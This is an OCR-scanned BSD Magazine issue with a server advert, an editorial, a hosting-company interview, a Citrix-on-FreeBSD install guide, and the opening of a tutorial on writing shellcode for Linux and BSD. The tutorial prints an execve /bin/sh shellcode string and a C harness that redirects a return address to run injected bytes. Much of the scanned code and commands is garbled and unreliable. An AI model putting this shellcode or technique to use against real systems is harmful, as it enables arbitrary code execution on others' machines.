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iX-Triton TwinBlade Servers: 
The Easy-to-Manage, Greener 
Way to Serve 
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Greenest, most energy-efficient 
blade server in the industry! 


V4 cuguemmsane i a Stig / 


The new Triton TwinBlade Server is the most technologically advanced blade server system in the industry, 
and the ideal solution for power-efficiency, density, and ease of management. 


The Triton TwinBlade Server supports 
up to 120 DP servers with 240 Intel® 
Xeon® 5600/5500 series processors 
per 42U rack, achieving an umatched 
0.35U per DP node. Up to two 4x QDR 
(40 Gbps) Infiniband switches, 1OGbE 
switches or pass-through modules give 
the TwinBlade the bandwidth to support 
the most demanding applications. 


With N+1 redundant, high efficiency 
(94%) 2500W power supplies, the 
TwinBlade is the Greenest, most energy- 
efficient blade server in the industry. The 


energy saved by the ixX-Triton TwinBlade 
Server will keep the environment cleaner 
and greener, while leaving the green in 
your bank account. 


Server management is also simple 
with the Triton Twin Blade Server. 
Remote access is available through SOL 
(Serial Over Lan), KVM, and KVM over 

IP technologies. A separate controller 
processor allows all of the Triton’s remote 
management and monitoring to function 
regardless of system failures, offering true 
Lights Out Management. 


Using the Triton’s management system, 
administrators can remotely control 
TwinBlades, power supplies, cooling 
fans, and networking switches. Users 
may control the power remotely to 
reboot and reset the Triton TwinBlade 
Center and individual Twin Blades, and 
may also monitor temperatures, power 
status, fan speeds, and voltage. 


For more information on the iX-Triton 
TwinBlade, or to request a quote, visit: 


http://www.iXsystems.com/tritontwinblade 


20 Server Compute Nodes in 7U of Rack Space 


The iX-TB4X2 chassis holds 10 TwinBlade servers and each 
TwinBlade supports two nodes. This gives the iX-TB4X2 chassis the 
ability to house 20 nodes in 7U of rack space. The powerful Triton 
TwinBlade achieves 0.35U per dual-processor node, and is twice as 
dense as the previous generation of dual-processor blades. 


A fully-loaded iX-Triton TwinBlade supports 40 Intel® Xeon® 
5600/5500 series processors and up to 2.5 TB DDR 
1333/1066/800MHz ECC Registered DIMM memory. In a 42U rack 
this translates into 120 nodes with 240 Intel® Xeon® 

5600/5500 series processors and 15 TB DDR 1333/1066/800MHz 
ECC Registered DIMM memory. 


» By replacing 1U servers with TwinBlade servers, the power 
savings of the iX-TB4X2 can reach more than $1000* per 
year, per server with reduced cooling costs added in. 


» Replacing 1U rackmount servers with an iX-TB4X2 Twin 
Blade can reduce carbon dioxide emissions by over 5.5 
metric tons.** 


> The iX-Triton TwinBlade delivers the most energy-efficient 
blade server in the industry with four N+1 redundant, high 
efficiency (94%) 2500W power supplies. 


* Electricity costs vary by location. 


** According to Energy Information Agency (a statistical agency of the U.S. Department of Energy), 
saving one kilowatt hour of electricity reduces carbon dioxide emissions by 1.43 pounds. 


Call iXsystems toll free or visit our website today! 
+1-800-820-BSDi | www.iXsystems.com 


Intel, the Intel lage, and Xeon Inside are trademarks or registered trademarks of Intel Corporation in the US. and other countries, 


Key features: 


Up to 10 dual-node TwinBlades in a 7U 
Chassis, 6 Chassis per 42U rack 
Remotely manage and monitor 
TwinBlades, power supplies, cooling fans, 
and networking switches 

Hardware Health Monitor 

Virtual Media Over Lan (Virtual USB, 
Floppy/CD, and Drive Redirection) 
Integrated IPMI 2.0 w/ remote KVM over 
LAN/IP 

Remote Power Control 

Supports one hot-plug management 
module providing remote KVM and IPMI 
2.0 functionalities 

Up to four N+1 redundant, hot-swap 
2500W power supplies 

Up to 16 cooling fans 


Each of the TwinBlade’s 
two nodes features: 


Intel” Xeon” processor 5600/5500 series, 
with OPI up to 6.4 GT/s 


Intel® 5500 Chipset 


Up to 128GB DDR3 1333/ 1066/ 800MHz 
ECC Registered DIMM / 32GB Unbuffered 
DIMM 


Intel® 82576 Dual-Port Gigabit Ethernet 
2 x 2.5" Hot-Plug SATA Drive Trays 
Integrated Matrox G200eW Graphics 


Mellanox ConnectX ODR InfiniBand 
40Gbps or 10GbE support (Optional) 


Powertul. 
Intelligent. | 
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Dear Readers! 
The calender is showing that autumn Is here»but the 


weather still reminds us about the summer. Wherever Soin ae 


Olga Kartseva 


you are and whatever you are doing - take a break olga. kartseva@software.com. pl 
and look into this issue. Contributing: 
; : : : gers Rob Somerville, Daniele Mazzocchio, Rashid N. Achilov, Joseba 
It might seem a little bit different to you this time, let Mendez, Laura Michaels 
US know how do you feel about it Lukas Holt, Caryn Holt, Laura Michaels 
In this issue you will find the second part of Daniele’s Special thanks to: 

: : : ; : Marko Mil ic, Worth Bish d Mike Byb 
article: Network Monitoring with Nagios and inti lat a ata ca Monon rita 
OpenBSD. Art Director: 

lreneusz Pogroszewski 
Some of the articles wilfmention Linux this time, 
: pine DTP: 
but don’t worry - it is just to make clear the diffirences reneuen coerce erel: 
between these two OS. 
You will find some information about Citrix and Senior Consultant/Publisher: 


Y : re Pawet Marciniak pawel@software.com.pl 
Festival in this issue and see some new authors 
: : National Sales Manager: 

con tributing a Ewa tozowicka 


ewa.lozowicka@software.com.pl 


Don’t forget about answering our surveys, they 


are really useful for us. And we are still looking for Marketing Director: 
: ‘ : Ewa tozowicka 
authors for russian version of BSD Magazine, please EWS IOTONICTE OCCT eC Onne! 


feel free to send us your feedback. 


Executive Ad Consultant: 


Thank you and enjoy your reading! Karolina Lesifiska 


karolina.lesinska@bsdmag.org 


Thank you! 
Advertising Sales: 
Olga Kartseva 
Ol ga Kartseva olga.kartseva@software.com.pl 
Editor in Chief Sp oy eee 
olga.kartseva@software.com.pl Software Press Sp. z 0.0. SK 


ul. Bokserska 1, 02-682 Warszawa 
Poland 
worldwide publishing 
tel: 1917 338 36 31 
www.bsdmag.org 


Software Press Sp z 0.0. SK is looking for partners from all over 
the world. If you are interested in cooperation with us, please 
contact us via e-mail: editors@bsdmag.org 


All trade marks presented in the magazine were used only for 
informative purposes. All rights to trade marks presented in the 
magazine are reserved by the companies which own them. 


The editors use automatic DTP system AUWRPUS 


Mathematical formulas created by Design Science MathType™. 
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Interview 
O06 Interview with Dirk H. Schulz 


Geniodata — Creative Data Solutions and Hosting. la interview 
with Dirk H. Schulz, which will give you a closer look at this 
company. 


GET STARTED 


1Q Installing a Citrix Client on FreeBSD 
Andrew L. Gould 

Citrix, like Samba with WinBind and Rdesktop help us access 
services and applications that may be required for our jobs but 
may not be available for FreeBSD. These ports are important 
for FreeBSD Advocacy because they help us integrate FreeBSD 
into a Windows enterprise environment. 

In this article, | will discuss the steps for installing the current, 
xen application version of the Citrix client on FreeBSD 7.3 and 
FreeBSD 8.1. 


HOW TO’S 


14 Writing shellcode for Linux and BSD 
Daniele Mazzocchio 

A shellcode is a sequence of machine language instructions 

which an already-running program can be forced to execute by 

altering its execution flow through software vulnerabilities (e.g. 

stack overflow, heap overflow or format strings). 
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How To Convert Text to Voice Using 

Festival and Lame in FreeBSD 

Diego Montalvo 
In the summer of 2010 grew a bit bored of building search based 
apps so | decided to brush the dust off of old Bob IChatter code 
base. After tons of code rewriting and little sleep, Bob Chatter 
version 1.0.0 IM|Chat for WebOS devices was released. Release 
1.0.1 of Bob Chatter includes a service which converts real-time 
chat instances into voice files. After realizing first hand there was 
little documentation regarding FreeBSD and voice technology, | 
decided to write a tutorial where others could learn from. 


‘3 4 FreeBSD Squid proxy with Parental 
Controls How-To 
Rob Somerville 
Traditionally, web pages were served via a webserver such as 
Apache and transmitted via the network on port 80 to a web- 
browser. 

While pages and content were cached in the local browser 
cache, on larger networks it made sense to use a caching 
proxy such as Squid to reduce external traffic over the net for 
frequently fetched pages such as Google. 


Network monitoring with Nagios and 

OpenBSD Part 2 

Daniele Mazzocchio 
One of Nagios’ key features is its extensibility; new functionality 
can be easily added thanks to its plugin-based architecture, the 
external command interface and the Apache (http://www.kernel- 
panic.it/openbsd/nagios/httpd.apache.org/) web server. In this 
chapter, we will take a look at a few common issues that can 
be addressed with some of the most popular addons (http:// 
www.nagiosexchange.org/) for Nagios. 


LET’S TALK 


5 (2) The Difference Between FreeBSD and 
Ubuntu in a Not So Technical Way 
Joshua Ebarvia 

As asystem administrator, | have been using various distributions 
of Linux and FreeBSD. | am comfortable in a mixed environment 
of *nix operating systems to provide network services. | will try 
to differentiate them and be unbiased as possible so as not to 
start a flame war. | enjoy working with both systems and | like 
the way they are. 
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Dirk H. Schulz 


genioDATA? 

Why yet another hosting comanpy? 

Our first idea was not to offer hosting services. We 
needed an environment for engineering and testing — 
building complex systems at customers’ sites means you 
have to do the engineering and testing somewhere else. 
And we were fed up with the typical test environment you 
puzzle up yourself — it had to be something professional, 
so we build up a production like environment in one of 
the best data centers and defined processes and usage 
rules. 


So you are not hosters from the beginning? 
No. We are system managers. We engineer, implement 
and run IT systems at our customers sites. 


Again: Why hosting then? 

That resulted from customer requests. When we told 
them of our engineering and testing data center, they 
wanted to place servers there and make use of certain 
services. The typical question was Couldn't you also do 
... for us there? 
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But that still is far from 
what you now offer, isn’t it? 
To keep things under control then we had to do a lot of 
standardization and process definition. On one hand we 
had customers running systems in our data center who 
expected reliable performance, on the other hand we still 
needed our engineering environment. We had to look at 
our own projects with the same service and process view 
like at our customers’ projects. 

The answer was tough standardization and minute 
discipline. We ended up defining lots of products the two 
of us could use: the customers and ourselves. 


What is the difference to mainstream hosting? 
We offer hosting, knowledge and consulting in modularized 
packages. The customer solves on his own whatever he 
can solve and takes from us what he needs on top of 
that, be it technical items, support or plain knowledge. 
The customer alone defines the parts that make up his 
individual environment. 

He can, let’s say, simply rent a virtual FreeBSD server 
and manage it on his own, but he can also outsource 
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part of the servers 

management to us 

or have us run a server 

farm completely. For 

administration on his own he 

can make use of community 

ressources or use our offers of 

support and consulting, whatever 
suits him best. 


That sounds great, but it still is not 
sufficient for uniqueness. Are there any USPs? 
Of course. We offer the biggest range of hosted 
operating systems — nearly all UNIXes and UNIX 
families are within. Additionally we are front runners 
when it comes to deploying enterprise techniques 
in still-not-enterprise-environments. You can _ easily 
rent a virtual NetBSD server, but where do you find a 
virtual NetBSD server that is run highly available in a 
clustered environment? Where can you have a MacOS 
X Server run including layered backups for additional 
data security? 


Enterprise environments are defined 

by prices that small and medium companies 
(SMCs) cannot pay, right? 

No, there is no correlation there. In an enterprise 
environment the focus is on availability, in SMCs the focus 
is on getting it running somehow. 


But SMCs depend on their IT the same way 
enterprises do, don’t they? 

Yes, they do. Email archives and digital file systems are 
more important today than analog files have been in 
previous decades. They just have to be available. Access 
times have to be much shorter nowadays. ,Always on” is 
needed. 


What can you do 

to move the focus in SMCs to availability? 

No need to do that, they already start realizing 
necessities. Legal authorities are quite modern in their 
requirements: emails have to be archived completely, 
searchably and with a thorough security concept, 
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otherwise penalties can be painful. Share holders and 
auditors demand revision proof document archives. 
Banks are evaluating their customers’ IT strategies 
during rating processes (i. e. your credit costs depend 
on your IT setup). All that forces SMCs to refocus their 
IT concepts. 


Can availability be bought? 

If yes: What has to be considered? 

No, availability is not a question of money, but of discipline. 
You always have to go four steps: 


¢ engineer a detailed concept, 

¢ make a real world test of the concept before 
implementation, 

¢ implement and run a comprehensive monitoring, 

¢ do regular tests on every vital part. 


If you leave out just one step, you risk losing the benefit 
of the others as well. 


Can you name examples? 

Yes. My favorite one is backups. It is not enough to make 
use of really good backup software, you always have to 
test restorability of your backed up data. Again and again 
we hear that customers can not restore their data in that 
one case of emergency — even with € 100.000 backup 
software. 


Operating Systems are the worlds in the I’ 
universe. Get yours: 

FreeBSD, NetBSD starting at € 25 

CentOS, OpenSuSE starting at € 25 

RHEL, SLES starting at € 42 

MacOS X Server starting at € 67 

Windows Server starting at € 42 


Got an idea? Make it live. 
In a genioDATA Server. 
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Itis not sufficient to 
implement something 
that should work — you 
have to make sure it does 
work. And if you do that, you 
can also use € O software as 
long as it does what you need. 
By the way: it is good practice 
to spend money if you get your 
money's worth. Spending lots of 
money to make yourself feel you have done 
the right thing just costs. 
You have to test thoroughly and regularly. Or get 
someone to do for you. 


How do you live up this principle 
in your hosting offers? 
For example there is lots of literature on what virtualization 
technique or product is the best — always comparing 
features. We could use that for decisions. Instead we test: 
150 virtual servers with 5 operating systems in a 6 months 
test run on each of them: Xen, VMware, Parallels Server, 
etc. We know very well now what is reliable and what 
is not. And we continue testing with every new release 
because the IT world changes fast. 

We rely on long term experience instead of well meant 
hopes. 


Let’s focus on money again: the four steps 

you named must be expensive for a small or 
medium company! 

That depends on how much previous engineering can 
be reused. If we have to invent something completely 
new there is ressources to commit, but we have 
manifold experience, we can reuse details from 
previous projects. That lessens the required ressources 
in engineering and pre production testing (steps one 
and two). Monitoring can in most parts be covered with 
previous work. 


Can you relate a success story to illustrate this? 
Yes. We have designed a middleware farm on base of 
Tomcat servers for a customer lately. We would have had 
to evaluate Tomcat session clustering against clustering 
via upstream load balancers, but we had run specialized 
tests on this comparison in another project for another 
customer. 

We only had to test if the customer’s software runs in 
the resulting environment. 


Of course our readers want to know what role 
BSD systems play in your projects! 

That depends. The advantages of BSD systems — 
mainly stability and very effective usage of resources 
— are really interesting in the enterprise market, but 
widely unknown there. When we propose the usage of 
BSD systems to hosting customers, they are afraid of 
not beeing able to migrate them to their own premises 
when they need to. 

But if the customer just rents a defined service matrix 
— let’s say a tiered webserver farm with certain features 
— then we are free to use BSD systems and in some cases 
we do. 

Our infrastructure systems (mail gateways, name 
servers and the like) are BSD based more and more. 


What future do you see for BSD systems? 

In a few years they will play a bigger role in the enterprise 
market than today. One important difference to Linux 
systems is their focus on a small set of necessities. Linux 
is multifarious and manifold, but that also leads to lots of 
possible errors. It is intense work to set up a slim, focused 
Linux system. 

And then there is another phenomenon: The BSD 
developers claim to produce code of a better quality, and 
our long term tests seem to point at the same direction. 

Now it is not only us who experiences this. And word 
is spreading. This will have an impact on BSD in the 
enterprise market. 

Meanwhile we strain to make BSD systems useable for 
small and medium companies. 
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Operating Systems are the worlds in the IT 
universe. Get yours: 

FreeBSD, NetBSD starting at € 25 

CentOS, OpenSuSE starting at € 25 

RHEL, SLES starting at € 42 

MacOS X Server starting at € 67 

: Windows Server starting at € 42 

Replicate your databases in high 
class data centers. Got an idea? Make it live. 
Have an email archive run by In a genioDATA Server. 
genioDATA that leaves nothing 

more to wish for. 

Copy your files to several sites to 

plan for desaster recoverage. 


Need an ERP environment 
(enterprise ressource planning)? 
Have to operate a web(services) 
cluster with 99,999 % availability? 
Need an email environment where 
not one email gets lost? 


genioDATA engineers it. 


genioDATA runs it. 
You use it. 


\/ a DATA 
info@sccon.de www.geniodata.com/bsdi.html +49(0)8092 862568 


GET STARTED 


Installing 


a Citrix Client on FreeBSD 


As our computing needs change, so does our criteria for 
selecting an operating system. Today, my job and my family 


are in different cities. 


What you will learn... 
¢ How to install Citrix on FreeBSD 


me to work from home on occasion. Since Citrix is 

my employer’s chosen method for remote access, 
my first criteria for selecting an operating system for home 
use Is its ability to run a Citrix client plugin. 

Citrix, like Samba with WinBind and Rdesktop help us 
access services and applications that may be required for 
our jobs but may not be available for FreeBSD. These 
ports are important for FreeBSD Advocacy because they 
help us integrate FreeBSD into a Windows enterprise 
environment. 

In this article, | will discuss the steps for installing the 
current, xen application version of the Citrix client on 
FreeBSD 7.3 and FreeBSD 8.1. 


man | have a considerate boss who allows 


Assumptions/requirements 


¢ X Windows should be properly configured and 
running. 

¢ Internet access should be properly configured. 

e Linux emulation should be activated. (Add iinux _ 
enable="YES” tO /etc/rce.conf and reboot) 

¢ You should have root access via su. 

¢ Ports should be up-to-date. For FreeBSD 8.1, | used 
the ports that were included on the installation DVD. 
For FreeBSD 7.3, | updated ports using portsnap on 
August 19, 2010. 
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What you should know... 
¢ FreeBSD 8.1 


¢ The Citrix client requires a Mozilla based internet 
browser. | recommend Firefox3.5 or Seamonkey 
because they also work with the Java plugin. 


The topics above are covered adequately by the 
FreeBSD handbook, which can be found here: 

http://www.freebsd.org/doc/en_US.ISO8859-1/books/ 
handbook/ 


Linux Base Port 
You will need to install a 1inux base port for Linux emulation. 
The Citrix client works with linux _base-fc4 and linux _base- 
£8, but does not work with iinux base-f10. Unfortunately, 
FreeBSD 8.1 and PC-BSD 8.1 use linux base-fio by 
default. 

For FreeBSD 7.3 simply execute: 


‘pkg add =r linux base-tc4’ 
For FreeBSD 8.1, perform the following : 

‘echo “OVERRIDE LINUX BASE PORT=f£8” >> /etc/make.conf’ 
‘echo “OVERRIDE LINUX NONBASE PORTS=£8”" >> /etc/make.conf’ 
‘pkg add -r linux base=-rs’ 
You will need to rebuild any linux applications you have 


installed previously. 
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PC-BSD 8.1 uSe@S linux base-f10 aS a part of its base 
installation. Therefore, | do not recommend downgrading 
the 1inux base port. 


Installation 

The port for the current Citrix client can be found at / 
usr/ports/net/citrix xenapp. There is also and older client 
called citrix ica; but Citrix does not keep links to old Citrix 
client files on its download web pages. 


Using an internet browser 


¢ Go to Attp:/www.citrix.com/English/SS/downloads/ 
details.asp?download/D=3323. This will take you to 
the Linux download page for Citrix clients. 

¢ Click on the Download button for tar.gz file of Version 
11.100. 

¢ Save the file 1inuxxg6-11.100.158406.tar.gz to your hard 
drive. 


In a terminal, use the su command to become root do the 
following: 


¢ Change the current directory to the location of where 
you saved the Citrix file. 

¢ Change the name of the file to citrix xenapp-linuxx86- 
11.100.158406.tar.gz. 

. Copy the file to /usr/ports/distiiles/. 

¢ Change the current directory to /usr/ports/net/citrix _ 
xenapp/. 

¢ Execute ‘make install clean-depends. 


FreeBSD will now install of the dependencies required for 
citrix xenapp. When it’s done, it will run the installation/ 
configuration script for the Citrix client. You will be asked 
the questions below. | have noted the answers | used. 


Question 1 
Select a setup option: 


1. Install Citrix Receiver for Linux 11.100 
2. Remove Citrix Receiver for Linux 11.100 
3. Quit Citrix Receiver for Linux 11.100 setup 
Enter option number 1-3 [1]: 
Answer: 1 


Question 2 
Please enter the directory in which Citrix Receiver for 


Linux is to be installed. 


[default /usr/local/ICAClient] 
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or type “quit” to abandon the installation: 
Answer: | pressed enter to accept the default. 


Question 3 
You have chosen to install Citrix Receiver for Linux 11.100 
in juer/ local/ICAClient, 
Proceed with installation? [default n]: 
Answer: y 


Question 4 
CITRIX(R) LICENSE AGREEMENT 

Use of this component is subject to the Citrix license 
covering the Citrix product(s) with which you will be using 
this component. This component is only licensed for use 
with such Citrix product(s). 
CEX code BP T AS34320 

Select an option: 


1. | accept 
2. | do not accept 
3. Enter option number 1-2 [2]: 
Answer: 1 


Question 5 
Could not find a browser installation on your system. 
Is a browser installed? [default n]: 
Answer: y 


Question 6 
Integration complete. 
No GNOME or KDE directories were found, skipping 
integration. 
return: Illegal number: -1 
Do you want to install USB support? [default n]: 
Answer: n 


Question 7 
Select a setup option: 


1. Install Citrix Receiver for Linux 11.100 
2. Remove Citrix Receiver for Linux 11.100 
3. Quit Citrix Receiver for Linux 11.100 setup 
Enter option number 1-3 [2]: 
Answer: 3 


CITRIX 
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‘\-— Opening launch.ica 


‘You have chosen to open 
launch.ica 
which ts a: ICA file 
from: https:iif 
What should Firefox do with this file? 


C) Open with 


[_] Do this automatically for files like this from now on. 


Browse... 


Figure 1. A window asking what to do with the file launch.ica 


ap Opening launch.ica 
‘You have chosen to open 
launch.ica 
which is ac ICA file 
from: https: 


What should Firefox do with this file? 


(*) Open with wica y| 


(C) Save File 
[¥]iDo this automatically for files like this from now on. 


Settings can be changed using the Applications tab in 


% cancel ox | 


Figure 2. Jo prevent repeating this step, check the box 


&-~ Client Error 


Resources 


http://people.freebsd.org/~tabthorpe/ 
http://www.freebsd.org/doc/en_US.ISO8859-1/books/ 
handbook/ 


installed, try again, or logoff. | selected the Already 
installed button. 

3 The next page | saw was the Citrix menu page where 
| could select an application to run! 


Once | selected an application, a window (see 
Figure 1) opened, asking me what to do with the file 
Laine f.. tas 

Click on the Browse button and go to /usr/iocal/ 
rcaclient/, Select the file wfica and click on the Open 
button. Then, so you don't have to repeat this step, check 
the box to Do this automatically for files like this from now 
on. This window should now look like Figure 2. 

Once this has been done, you should be able to use the 
applications/services made available through the Citrix 
portal. 

You may get a message that you have not chosen to 
trust the server’s security certificate. The one | received 
is in Figure 3. 


You have not chosen to trust "GlobalSign Root CA", the issuer of the server's security certificate (SSL error 61). 


Figure 3. A message showing that you have not chosen to trust the server's security certificate 


Configuring Firefox 
| chose Firefox3.5 as my browser for using the Citrix 
client; but any mozilla-based browser will suffice. 

Open your browser using your normal, non-root user. 
From the menu, select Edit/Preferences. When the 
Preferences window opens, click on Content. If you have 
the Block pop-up windows option checked, click on the 
Exceptions button and add your company’s Citrix server's 
website to the exceptions list. Then you can close the 
Preferences window. 

In your browser, go to your Citrix server’s website. At 
this point, | can only address matters as they occur with 
my employer's Citrix website. Your setup and experience 
may differ. Here’s how it went for me: 


1 | reached a login page, so | logged in. 

2 | was taken to a page that stated that a Citrix 
client could not be detected. | was given options to 
download a client, state that a client was already 
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To fix this, download the certificate issuer’s (GlobalSign 
Root CA in this case) root certificate and copy it to the 
directory: 


/usr/local/ICAClient/keystore/cacerts/ 


It is important to emphasize here that importing the 
certificates into your browser’s keystore will not solve 
the problem. In fact, your browser may already have 
the certificates. The Citrix client does not use Firefox’s 
certificate keystore. 

At this point | was able to open and use the applications 
that were available on the Citrix portal, and access files on 
my employer’s network. | hope you meet with the same, 
happy Success. 

| would like to thank port maintainer Thomas Abthorpe for 
his work on the Citrix client ports, his patience and his help. 
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Writing shellcode 


A shellcode is a sequence of machine language instructions 
which an already-running program can be forced to execute 
by altering its execution flow through software vulnerabilities 
(e.g. stack overflow, heap overflow or format strings). 


What you will learn... 
¢ How to write a shellcode (verifying,examining etc.) 


n other words, it is the notorious arbitrary code 
which can be run on systems affected by specific 
vulnerabilities. Typically, a shellcode looks like: 


char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\ 
x76\x08\x89\x46" 
"\x0c\xb0\x0b\x8d\xle\x8d\x4e\x08\x8d\ 
x56 \x0C\xcd\ x30" 
"\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\ 


x2£\x73\x68"; 


that is a sequence of binary bytes (machine language). 

The purpose of this document is to introduce some of 
the most widespread techniques for writing shellcode 
for Linux and *BSD systems running on the IA-32 (x86) 
architecture. 

You may wonder why you should learn anything about 
writing shellcode, since you can find a lot of ready-to-use 
shellcodes on the internet (after all, that's what copy and 
paste is for). Anyway, | think there are at least two good 
reasons: 


¢ first of all, it's always a good idea to analyze someone 
else's shellcode before executing it, just to know 
what's going to happen and to avoid bad surprises 
(we will discuss this later (http:/,www.kernel-panic. it/ 
security/shellcode/shellcode6.htm!) in detail); 
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What you should know... 


« Have some basic knowledge on OpenBSD and Linux 


¢ besides this, keep in mind that the shellcode may 
have to run in the most diverse environments (input 
filtering, string manipulation, IDS...) and, therefore, 
you should be able to modify it accordingly. 


Listing 1. Syscalls are defined in the /usr/src/linux/include/ 
asm-i386/unistd.h file, and each is paired with a number 


juste sec linux/incinde/asm—-1380/ umes td. in 
#ifndef ASM 1386 UNISTD H 
#detine ASM 1386 UNISTD H 


Te 
* This file contains the system call numbers 


7, 


#define | NR exit 
#define | NR_ fork 
#define NR _ read 
#define | NR write 
#define | NR open 
#define | NR_ close 
#define | NR waitpid 


CS S| oy Gree G&G W 


#define NR _ creat 
lige 
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A good knowledge of IA-32 assembly programming 
is assumed, since we won't dwell much on strictly 
programming topics, such as the use of registers, 
memory addressing or calling conventions. 

Anyway, the appendix provides a short bibliography 
useful to anyone who wants to learn the basics of 
assembly programming or just to refresh one's memory. 
Last, a littlke knowledge of Linux, *BSD and C can be 
helpful... 


Linux system calls 

Though shellcodes can do almost anything, they're 
ususally aimed at spawning a (possibly privileged) shell 
on the target machine (that's where the name shellcode 
comes from...). 

The easiest and fastest way to execute complex 
tasks in assembler is using system calls (or syscalls, 
as their friends call them). System calls constitute the 
interface between user mode and kernel mode; in other 
words, system calls are the means by which userland 
applications obtain system services from the kernel, such 
as managing the filesystem, starting new processes, 
accessing devices, etc. 

Syscalls are defined in the /usr/src/1inux/include/asm- 
i386/unistd.h file, and each is paired with a number: see 
Listing 1. 

There are normally two ways to execute a syscall: 


¢ triggering the 0x80 software interrupt; 
¢ using the libc wrapper functions. 


The first method is much more portable, since it is 
based on system calls defined in the kernel code 
and, therefore, common to all Linux distributions. The 
second method, which uses the addresses of the 
C functions, instead, is hardly portable among different 
distributions, if not among different releases of the 
same distribution. 


int 0x80 

Let's take a look at the first method. When the CPU 
receives a Ox80 interrupt, it enters kernel mode and 
executes the requested function, getting the appropriate 
handler through the Interrupt Descriptor Table. 

The syscall number must be specified in zax, which 
will eventually contain the return value. The function 
arguments (up to six), instead, are passed in the sepx, 
ECX, EDX, ESI, EDI and esp registers (exactly in this order 
and using only the necessary registers). If the function 
requires more than six arguments, you need to put them 
in a structure and store the pointer to the first argument 
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Listing 2. The main page tells us that it requires only one 
parameter 


man 2 Seeing 


IEE (4), Linux Programmer's Manual EXE (2) 
NAME 

fexit,. Exte = (ESCtmindre Ene CUmceme process 
SYNOPSIS 


Fincluae <Uniseo,h-> 


70 1dey Coun (ebhie owas) 


Listing 3. Jo compile with gdb and disassemble 


o gdb. /exit 

GNU gdb 6.1-debian 

Copyright 2004 Free Software Foundation, Inc. 

GDB is free software, covered by the GNU General 
Public License, and you are 

welcome to change it and/or distribute copies of it 
under certain conditions. 

Type "show copying" to see the conditions. 

There 1S absolutely no warranty for GDB. Type "show 
warranty" for details. 

Tits GWE was Connogured as "13 c6-linux' 2. Using, hose 
libthread db Pabrary "/1ib/ 
Ih at one lavaicevel ole) Sieve = ae 


(gdb) break main 
Breakpoint 1 at 0x804836a 
(gd) “run 


Starting program: /ramdisk/var/tmp/exit 


Breakpoint 1, 0x0804836a in main () 


(gdb) disas main 

Dump of assembler code for function main: 
0x08048364 <maint0>: push Sebp 

Ox06048365 <marn+til>: mov sesp, sebp 
0x08048367 <main+3>: sub S0x8, Sesp 
Ox0804836a <main+o>: and Orb kh nO, oso 
0x0804836d <maint+9>: mov SOx0, eax 
0x08048372 <main+14>;: sub Sax, SESP 
Ox08048374 <maint les: movl S$0x0, (Sesp) 
0x0804837b <main+23>: call 0x8048284 <exit> 


End of assembler dump. 


(gdb) 
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In zsx. Note: Linux kernels prior to 2.4 didn't use the zsp 
register for passing arguments and, therefore, could pass 
only up to 5 arguments using registers. 

After the syscall number and the parameters have been 
stored in the appropriate registers, the 0x80 interrupt is 
executed: the CPU enters kernel mode, executes the 
system call and returns the control to the user process. 

To recap, to execute a system call, you need to: 


e store the syscall number in zax; 
e store the syscall arguments in the appropriate 
registers or: 


¢ create an in-memory structure containing the 
syscall parameters, 
¢ store in esx a pointer to the first argument; 
¢« execute the 0x80 software interrupt. 


Now let's take a look at the most classic example: the _ 
exit(2) syscall. We know from the /usr/src/linux/include/ 
asm-i386/unistd.h file (See above) that it is number 1. The 
man page tells us that it requires only one parameter 
(status): see Listing 2. 

which we will store in the esx register. Therefore, the 
instructions for executing this syscall are: 


Listing 4. Executing the system call 


(gdb) disas exit 

Dump of assembler code for function exit: 

a 

Ox40052aed <exitt+141>: mov 0x8 (sebp) , seax 
Ox40052af0 <exit+144>: mov %eax, (SeESDP) 

Ox 200s Zeno exit ae eal 400 cedve.- fax 
eee 

End of assembler dump. 

(gdb) disas Vexit 


DUMP On dssemolen code for funeplen sexi: 


Ox400cedJe (exile: mov 0x4 (esp) , sebx 
Ox400ceda0 <_exit+4>: mOvV PUREC, ocx 
Ox400Gedas <exitto-; aban $0x80 
0x400ceda7? <_exitt+1l1>: mov SO0x1,%eax 
Ox400cedac <_exit+16>: int $0x80 


Uxt0cedee <vexicale> sels 


Oxt00cedat ~<vexit io> nop 
End of assembler dump. 


(gdb) 


Listing 5. Here are the first lines of the file (/usr/src/sys/kern/ 
syscalls.master file) on OpenBSD 


/usr/src/sys/kern/syscalls.master 


eres 


1 STD (PeVOUCMS Sve (iit aval) | yi} 
Z STD fo IETS ys Fore (yerd) ai} 
3 STD ib SSILaS Use. ee sic aes eel - 


Voids SUE pel Zen Mbyte); 7) 
4 STD Lees ize Sess ys Wire (ines ba, 
Const vice ebur a \ 


Size we My ine a: 


3) Sal (oO UN SVs Open (Constvchar pati, | 
Aes tlacs,e- 1 OCC Ee Odea an) 
6 SUED) (bigs sis Clle\sie (angie, amel) 2 


q SED j Pldee sys waltaipid se pid, 
int. “Stat tsem ont Opt mons — \ 
Struck rusage “rusage); } 
8 COMPAT 43 Velie Ss Voneuedm (Conse elim 


“path, mode & mode) 7) mocreat 


Listing 6. Getting the opcodes 


So hasm =i olf exit. asm 


> Ob IGUMO. —d exit. 


exit.o: file format elf32-1386 


Disassembly of section .text: 


O0000000 <.text>: 


0 bb 010 00) G0" 0:0 mov S0x0, %ebx 
oe bs OL 00 00 00 mov SOx1, eax 
a: cd 80 hohe S0x80 


Listing 7. Testing the opcodes 


Seer anerc 


char shellcode[] = "\xbb\x00\x00\x00\x00" 
UN xe V0) 00) x00 0.0" 
rN ca sco 0") 
it. main () 
{ 
inte *nets 
ree = (int *) &reu +> 2; 
(*ret) = (int) shellcode; 
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exit.asm 

mov eax, 1 ; Number of the exit(2) syscall 
mov ebx, 0 ; Status 

int 0x80 ; Interrupt 0x80 


libc 

As we've stated before, a system call can also be 
executed by the means of a C function. So let's take 
a look at how to achieve the same results as above using 
a simple C program: 


Listing 8. Verifiyng the shellcode 


© Secs 4 / SC auc 


exeeve( sc exter i .fsc exie (poly le wars 4) |= 0 
uname ({sys="Linux", node="Knoppix", ...}) = 0 
brek (0) = 0x8049588 


old map (NULL, 4096, PROL READ |PROT WREER, MAP) 
PRIVATE) |MAP ANONYMOUS, 17-0)" — 
0x40017000 

access (/ctc, id.co.monweap 7 2 OX) = -]1 ENOENT 


(No such file or directory) 


open ("/etc/ld.so.preload", O RDONLY) = -1 ENOENT 
(No such file or directory) 

open ("/etc/ld.so.cache", O RDONLY) = 5 

ho tatoe (3,0 se mede—s VUEREG (G44 stesize—o04720 an. |) 
= 0 

old mma (NUMGE 604207 FRO READ MAPTERE VATE 3, 0) = 
